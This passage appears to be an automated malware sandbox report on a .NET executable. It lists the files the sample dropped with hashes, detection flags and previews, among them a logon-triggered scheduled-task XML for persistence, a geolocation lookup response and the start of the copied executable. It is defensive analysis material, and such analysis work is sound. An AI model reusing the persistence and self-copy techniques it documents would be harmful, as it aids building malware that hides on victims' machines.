                                                                                                                                              Size (bytes):1216
                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LdSbZG1iH6.exe.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1216
                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):963
                                                                                                                                              Entropy (8bit):5.014904284428935
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                              MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                                                                              SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                                                                              SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                                                                              SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2232
                                                                                                                                              Entropy (8bit):5.379460230152629
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:fLHyIFKL3IZ2KRH9Oug8s
                                                                                                                                              MD5:FC2D360EC9CA945C562E3B5C1685B424
                                                                                                                                              SHA1:4B69CCEDE2E97E9F699C76EE0148C105E7D6FFA4
                                                                                                                                              SHA-256:7BB70E950D7A4B6C6047A44D4F722245B5E872228CF58FA2005FEE27979C25CF
                                                                                                                                              SHA-512:2C22E9797C5124D72B70493DBD64AA9C331A5B647BD2A0AD3E46DB8AAF10CFE3AD9274E525F83B19A8EDBC4E419DCCA32BA081E8D8D5D1F0D14A57639B0C50AD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                              C:\Users\user\AppData\Local\Temp\WERD542.tmp.WERDataCollectionStatus.txt

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4736
                                                                                                                                              Entropy (8bit):3.237864095579834
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:pwpwickXkkXfkuguWQ0QA0QI0Qgh0QXb0QL0Q9GU4gUXu1szeuzSzbxGQI5lmf8C:pJle+uig8DoeyOkN4t
                                                                                                                                              MD5:2587D5BB319FE0D87285665A473CDD80
                                                                                                                                              SHA1:8C35DCD11A7701EB2EBD00741FFCE015269BF13A
                                                                                                                                              SHA-256:82CD9BBBC801168610BC78C4B000FAB0F1DDF9AF8E940523D1A0DC9D7C08390D
                                                                                                                                              SHA-512:9873F68CB5C63FBD119646FC7B467F309A060D8E0A59107FC6AD1FE652D31AAC4E8C79B0853843B85C531B93DCB8C804193D2AEF19660EF0F08243DAA2179917
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.9./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.5.3.5.1.3.6. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uvtu4f2.lrg.psm1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yqmhoar.b1b.psm1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxi5hfxu.2er.psm1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iao3023k.mcf.psm1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mk0u01ci.gxs.ps1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uswpe4jv.znk.ps1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vs5d0ztd.xvn.ps1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsc3q513.hpv.ps1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\bhvD3AB.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x829fa422, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20447232
                                                                                                                                              Entropy (8bit):1.2821197718047688
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:6dg6eIi7CKqOfvODR2d+SW5cN/FgHhg/6F:DIZfDU+
                                                                                                                                              MD5:408EBB83084D079444B7977D9FAE1B94
                                                                                                                                              SHA1:3C85CD2D6A62AE2D1873CC4C247A45E0912A945F
                                                                                                                                              SHA-256:33A24805203BF0D0B91863352E06B4E87ADAB4FFB65085F8B7C773D4165F1DC6
                                                                                                                                              SHA-512:4849D0C6561CEE7F7A226727D2321D5D8F7359E2AAA28B9415425BDA8D3171998F56F4FF1BC56A93BBE8E38FB6BB443D06411DDA0226B3DF9884F0803B482640
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..."... ........=......J}...0...{........................#..........{..;....{O.h.%..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;....................................P;....{O...................P.;....{O..........................#......h.%.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1575
                                                                                                                                              Entropy (8bit):5.1143780321897125
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtai5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT/v
                                                                                                                                              MD5:0A9B3B9F96AC38AA30726F501E4DF92B
                                                                                                                                              SHA1:00EEE4F457C16587B9A2C4AE2AC5C5F8429E6EC4
                                                                                                                                              SHA-256:B18D9D8D7199E988CB79B5930DC87FDF86C8DB365BA15B05F743E787004E7432
                                                                                                                                              SHA-512:6855B34166B539B8ED317386225BA704BFD70D8D3975757FC364FB08039C6B06219ECE2280934E6BF748FEB0FD0B0691392CA44F3235C40F7CCE646FA453D420
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpECC1.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1575
                                                                                                                                              Entropy (8bit):5.1143780321897125
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtai5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT/v
                                                                                                                                              MD5:0A9B3B9F96AC38AA30726F501E4DF92B
                                                                                                                                              SHA1:00EEE4F457C16587B9A2C4AE2AC5C5F8429E6EC4
                                                                                                                                              SHA-256:B18D9D8D7199E988CB79B5930DC87FDF86C8DB365BA15B05F743E787004E7432
                                                                                                                                              SHA-512:6855B34166B539B8ED317386225BA704BFD70D8D3975757FC364FB08039C6B06219ECE2280934E6BF748FEB0FD0B0691392CA44F3235C40F7CCE646FA453D420
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                              C:\Users\user\AppData\Local\Temp\xgyrrizik

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..

                                                                                                                                              C:\Users\user\AppData\Roaming\DGlxtFUfY.exe

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1012224
                                                                                                                                              Entropy (8bit):7.866911689636022
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:X2leFeHHdWGhuvZJY9JuynjHOMt33ylD9ESMAwL1zGUxj:GsFsHthuvZJunjHOY32nMAwxL
                                                                                                                                              MD5:B2618FBB2E344DBDC7D4B33947D71531
                                                                                                                                              SHA1:A56C4724EDEF9A8FEF490520ECAEB30C8356E314
                                                                                                                                              SHA-256:04E6DDA7961928FADEECD13E02B9195D31A5E3A9925D4DE51072089BC7A1B452
                                                                                                                                              SHA-512:1CA8727770D6458785C1206E81FA6F69675AFB521944A9206197BCC9737A81AFEA2A462BF93BBFBE836B841038E01C354FD9D2ABDD902F13187A970A4EDE6B57
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..h............... ........@.. ....................................@.....................................O....................................t..p............................................ ............... ..H............text....g... ...h.................. ..`.rsrc................j..............@..@.reloc...............p..............@..B.......................H.......PI..\'...........p..p..............................................}.....(.......(.......s#...}....*.0............(.....s......o.....*B..{......o%....*B..{......o$....*.0............{....(.......(....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0..5.........s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.

                                                                                                                                              C:\Users\user\AppData\Roaming\DGlxtFUfY.exe:Zone.Identifier

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):26
                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Entropy (8bit):7.866911689636022
                                                                                                                                              TrID:
